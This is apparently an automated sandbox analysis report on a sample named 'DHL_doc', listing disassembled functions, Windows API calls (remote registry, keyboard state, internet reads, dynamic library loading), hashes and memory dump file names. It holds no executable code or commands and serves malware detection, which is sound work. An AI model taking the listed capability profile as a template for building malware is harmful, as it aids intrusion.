Opcode Fuzzy Hash: dbe7db2db9bdf14f8a83cd0df6b45c440b9d6316d4dfbb8e52e1b2087be2e25f
Instruction Fuzzy Hash: 2C51B5B24083955BC724EB90DC81DDFB3ECAF84350F10092EF689D3192EF35A6889766

Function 00F4B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00EC9CB3: _wcslen.LIBCMT ref: 00EC9CBD

Part of subcall function 00F4C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F4B6AE,?,?), ref: 00F4C9B5
Part of subcall function 00F4C998: _wcslen.LIBCMT ref: 00F4C9F1
Part of subcall function 00F4C998: _wcslen.LIBCMT ref: 00F4CA68
Part of subcall function 00F4C998: _wcslen.LIBCMT ref: 00F4CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F4BAA5
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F4BB00
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00F4BB63
RegCloseKey.ADVAPI32(?,?), ref: 00F4BBA6
RegCloseKey.ADVAPI32(00000000), ref: 00F4BBB3

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: f535d682a620d50c85188c2b4566a046b9bd725d5291f12011dc638cb46343b7
Instruction ID: 2b3eb77e75aa1732b33922ac3da887bd80d05d497c7415485460e6529e14ace7
Opcode Fuzzy Hash: f535d682a620d50c85188c2b4566a046b9bd725d5291f12011dc638cb46343b7
Instruction Fuzzy Hash: 6361A031608241AFD314DF14C895F2ABBE5FF84318F14855CF89A8B2A2CB35ED46DB92

Function 00F28BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00F28BCD
VariantClear.OLEAUT32 ref: 00F28C3E
VariantClear.OLEAUT32 ref: 00F28C9D
VariantClear.OLEAUT32(?), ref: 00F28D10
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00F28D3B

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 7e14e3e13d77290c9d6dc6a8b8b5af61189578466d9137f64a9fc08840e41f71
Instruction ID: da32877ab49212857583e344c895b167dbcffaa9ec797424c6c8c2cc96839e2a
Opcode Fuzzy Hash: 7e14e3e13d77290c9d6dc6a8b8b5af61189578466d9137f64a9fc08840e41f71
Instruction Fuzzy Hash: C75169B5A01219EFDB10CF68D884EAAB7F8FF89350B158559E906DB350E730E912CF90

Function 00F38AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00F38BAE
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00F38BDA
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00F38C32
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00F38C57
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00F38C5F

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: 44bf77dd9e3ba14a61fa7c4777983848b7bc8724c70e33b3689aea5961a15f0d
Instruction ID: 2846c8dee8548185483769fd2692212b3fac6fab7f3d43b81ded8cc72339a569
Opcode Fuzzy Hash: 44bf77dd9e3ba14a61fa7c4777983848b7bc8724c70e33b3689aea5961a15f0d
Instruction Fuzzy Hash: 5A513935A002199FCB04DF64C881E69BBF5FF49364F088459F84AAB362CB35ED52DB90

Function 00F48EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 00F48F40
GetProcAddress.KERNEL32(00000000,?), ref: 00F48FD0
GetProcAddress.KERNEL32(00000000,00000000), ref: 00F48FEC
GetProcAddress.KERNEL32(00000000,?), ref: 00F49032
FreeLibrary.KERNEL32(00000000), ref: 00F49052

Part of subcall function 00EDF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00F31043,?,753CE610), ref: 00EDF6E6
Part of subcall function 00EDF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00F1FA64,00000000,00000000,?,?,00F31043,?,753CE610,?,00F1FA64), ref: 00EDF70D

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: 4b62d5b5c2e8760cb19856f6e6a9ca60fa8f3e45d18029c86a6656349ae2d89f
Instruction ID: 1906576c4353b46be960da956651569d1ebdb772cb17eb481982f1abb61fb7af
Opcode Fuzzy Hash: 4b62d5b5c2e8760cb19856f6e6a9ca60fa8f3e45d18029c86a6656349ae2d89f
Instruction Fuzzy Hash: C0513935A04205DFC715DF68C484DADBBF1FF49324B048099E806AB362DB32ED86DB90

Function 00F56B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 00F56C33
SetWindowLongW.USER32(?,000000EC,?), ref: 00F56C4A
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00F56C73
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00F3AB79,00000000,00000000), ref: 00F56C98
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00F56CC7

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: 4aaf89a68bc3f73305bb1f211fa5c14f9266c4c64ae3d56aacbe18deba4cd3e6
Instruction ID: da0d71ec2cb5e0aeed5e9a95ddd1d111f4f07ca3f9625cf7d26c675a8edfc199
Opcode Fuzzy Hash: 4aaf89a68bc3f73305bb1f211fa5c14f9266c4c64ae3d56aacbe18deba4cd3e6
Instruction Fuzzy Hash: 6E41DC35A04204AFD724CF28CC59FA57FA5EB09362F550124FEA5E73E1C371AD45E640

Function 00EF2051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00EF20C3
_free.LIBCMT ref: 00EF20E3

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 86c95a403fddccf1023c134db182a49c80fd42cfb555ee016f34833174305bc8
Instruction ID: b4856085109f5bb444204c8fc9dbf2d3fd483e4cb1631c89b716d701760e42eb
Opcode Fuzzy Hash: 86c95a403fddccf1023c134db182a49c80fd42cfb555ee016f34833174305bc8
Instruction Fuzzy Hash: 2A41D132A002089FCB24DF78C880AAEB7E5EF89714B1545ADE715FB391DB31AD01CB81

Function 00ED912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00ED9141
ScreenToClient.USER32(00000000,?), ref: 00ED915E
GetAsyncKeyState.USER32(00000001), ref: 00ED9183
GetAsyncKeyState.USER32(00000002), ref: 00ED919D

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 03feef34aedd59f337ad0f4cde2ba7bc3f493d02d289f7d50093f5548da80e59
Instruction ID: fc9b0946d83f6659c80619dd27e9411a1b0e3028d3d88b3c553307f1aefb83c1
Opcode Fuzzy Hash: 03feef34aedd59f337ad0f4cde2ba7bc3f493d02d289f7d50093f5548da80e59
Instruction Fuzzy Hash: 0D41607190861AFBDF19AF64CC48BEEB774FB05324F204216E429B3291C7346995DF91

Function 00F33874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 00F338CB
TranslateAcceleratorW.USER32(?,00000000,?), ref: 00F33922
TranslateMessage.USER32(?), ref: 00F3394B
DispatchMessageW.USER32(?), ref: 00F33955
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F33966

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: 7ecd5439772c0fe37bdcce8395c36d6ca44747872b8e371a51d0447bde0777d5
Instruction ID: aae5d2360edb309de8dc6ed87ce04e220575e748ee17ee21e90d8482fa200bab
Opcode Fuzzy Hash: 7ecd5439772c0fe37bdcce8395c36d6ca44747872b8e371a51d0447bde0777d5
Instruction Fuzzy Hash: C031D371D0634ADEFB35CB349C49FB637A9EB05335F04056AE462C21A0E3B49A85FB61

Function 00F3CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00F3C21E,00000000), ref: 00F3CF38
InternetReadFile.WININET(?,00000000,?,?), ref: 00F3CF6F
GetLastError.KERNEL32(?,00000000,?,?,?,00F3C21E,00000000), ref: 00F3CFB4
SetEvent.KERNEL32(?,?,00000000,?,?,?,00F3C21E,00000000), ref: 00F3CFC8
SetEvent.KERNEL32(?,?,00000000,?,?,?,00F3C21E,00000000), ref: 00F3CFF2

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: 02a685ef7ab36a4ba6abcda3b16fa95b05f3dcc94f6bfec92544d19b66356060
Instruction ID: 4be62efcbbc254f60ee7ec56d4fa51bf892228b018d9d60b07cdab4c7e76805a
Opcode Fuzzy Hash: 02a685ef7ab36a4ba6abcda3b16fa95b05f3dcc94f6bfec92544d19b66356060
Instruction Fuzzy Hash: 22312D71904709AFDB20DFA5D884AABBBF9EB14365F10442EF516E2151D730ED41EBB0

Function 00F21901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00F21915
PostMessageW.USER32(00000001,00000201,00000001), ref: 00F219C1
Sleep.KERNEL32(00000000,?,?,?), ref: 00F219C9
PostMessageW.USER32(00000001,00000202,00000000), ref: 00F219DA
Sleep.KERNEL32(00000000,?,?,?,?), ref: 00F219E2

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 99764ada36655dfdf99dff057ecfed1fbb369eb9a77dedc71bc6185b86492382
Instruction ID: f58005cbd7ef9467475ab7cb3da8eff566d464fb0ea21e084aa598d3e195a66c
Opcode Fuzzy Hash: 99764ada36655dfdf99dff057ecfed1fbb369eb9a77dedc71bc6185b86492382
Instruction Fuzzy Hash: 3E31D37190022DEFCB10CFA8DD58ADE3BB5FB14325F104225FA22A72D1C3709944EB90

Function 00F55706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 00F55745
SendMessageW.USER32(?,00001074,?,00000001), ref: 00F5579D
_wcslen.LIBCMT ref: 00F557AF
_wcslen.LIBCMT ref: 00F557BA
SendMessageW.USER32(?,00001002,00000000,?), ref: 00F55816

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: e76221594622526222a2a1b8fad3e9f81743052cb6ba8ece5734786af98d25e9
Instruction ID: b19d692df9e65e2ba0373a99b8305292b385faad22fde9f516aa1cdf6a934369
Opcode Fuzzy Hash: e76221594622526222a2a1b8fad3e9f81743052cb6ba8ece5734786af98d25e9
Instruction Fuzzy Hash: 60219371D0461CDADB20DFA0DC94AED77B8FF45B22F108216EE19EA180D7708A89EF50

Function 00ED990E Relevance: 7.6, APIs: 5, Instructions: 71COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00ED98CC
SetTextColor.GDI32(?,?), ref: 00ED98D6
SetBkMode.GDI32(?,00000001), ref: 00ED98E9
GetStockObject.GDI32(00000005), ref: 00ED98F1
GetWindowLongW.USER32(?,000000EB), ref: 00ED9952

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Color$LongModeObjectStockTextWindow
String ID:
API String ID: 1860813098-0
Opcode ID: 485c596e37b3feb2315d0598e2210a7484c181eb1d6cd211e83373510f4271c2
Instruction ID: f37955284465c72ca10716202747b3051fb3f9e82a054a4d2a8871d0ebd14331
Opcode Fuzzy Hash: 485c596e37b3feb2315d0598e2210a7484c181eb1d6cd211e83373510f4271c2
Instruction Fuzzy Hash: F6218B311453449FCB264B34EC65AFA3B60EB4233AF08416FE692A62E3C2310942EB41

Function 00F40930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00F40951
GetForegroundWindow.USER32 ref: 00F40968
GetDC.USER32(00000000), ref: 00F409A4
GetPixel.GDI32(00000000,?,00000003), ref: 00F409B0
ReleaseDC.USER32(00000000,00000003), ref: 00F409E8

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 0c466a09619c52c0954e9c63509bde3e98e8990d99cf8c7fe90766fe8013503a
Instruction ID: 2fe88067470fdda28fdf2598e3a25ebbcb4047fdcd598fbf98f5a2bf00958a2f
Opcode Fuzzy Hash: 0c466a09619c52c0954e9c63509bde3e98e8990d99cf8c7fe90766fe8013503a
Instruction Fuzzy Hash: 5021A135600214AFD714EF64CD85AAEBBE9EF48711F04842CFD4AA7352CB30AD04DB90

Function 00EFCDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00EFCDC6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00EFCDE9

Part of subcall function 00EF3820: RtlAllocateHeap.NTDLL(00000000,?,00F91444,?,00EDFDF5,?,?,00ECA976,00000010,00F91440,00EC13FC,?,00EC13C6,?,00EC1129), ref: 00EF3852

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00EFCE0F
_free.LIBCMT ref: 00EFCE22
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00EFCE31

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 563c47b8df5608205404fa80dfe47276b1458213b3f5996bb070bfc3eb03e10b
Instruction ID: cb26ffca2b9677b09931e05fad6a9a1377d78ac2ad18936d2708be5f6cb2fbff
Opcode Fuzzy Hash: 563c47b8df5608205404fa80dfe47276b1458213b3f5996bb070bfc3eb03e10b
Instruction Fuzzy Hash: 3C01D472A0171D7F232116B66D88CBB7A6DDFC6BA53351129FB05E7200EA618D0191F0

Function 00ED9639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00ED9693
SelectObject.GDI32(?,00000000), ref: 00ED96A2
BeginPath.GDI32(?), ref: 00ED96B9
SelectObject.GDI32(?,00000000), ref: 00ED96E2

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: f9bf2273ef4590bc192716a195babf4b6c4ffab03aadb8cdd487f3f976325ed0
Instruction ID: fc50c3fdf91726b84882ad2af5f6322e7182fe00baa4a07df304189abdca5bb6
Opcode Fuzzy Hash: f9bf2273ef4590bc192716a195babf4b6c4ffab03aadb8cdd487f3f976325ed0
Instruction Fuzzy Hash: 0D21803080230AEFDB119F65DC047AD7BB8FB003A6F104227F525A62B1D3719896EB90

Function 00F25711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00F25726
_memcmp.LIBVCRUNTIME ref: 00F25744
_memcmp.LIBVCRUNTIME ref: 00F25757
_memcmp.LIBVCRUNTIME ref: 00F2576F
_memcmp.LIBVCRUNTIME ref: 00F25787

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 8bb961eaa513416800907acdf15dfdfd68de95e20319b9d98bc447a950c2dda8
Instruction ID: 44aa8339c55f706dcba75d0ebf1ce3aa851756cbe268f1174d1d30e39a20a764
Opcode Fuzzy Hash: 8bb961eaa513416800907acdf15dfdfd68de95e20319b9d98bc447a950c2dda8
Instruction Fuzzy Hash: D101B972A8165DFBD2089511AD42FBB739C9B61BA5F004070FE04AE641F774ED54A2A1

Function 00EF2DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00EEF2DE,00EF3863,00F91444,?,00EDFDF5,?,?,00ECA976,00000010,00F91440,00EC13FC,?,00EC13C6), ref: 00EF2DFD
_free.LIBCMT ref: 00EF2E32
_free.LIBCMT ref: 00EF2E59
SetLastError.KERNEL32(00000000,00EC1129), ref: 00EF2E66
SetLastError.KERNEL32(00000000,00EC1129), ref: 00EF2E6F

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

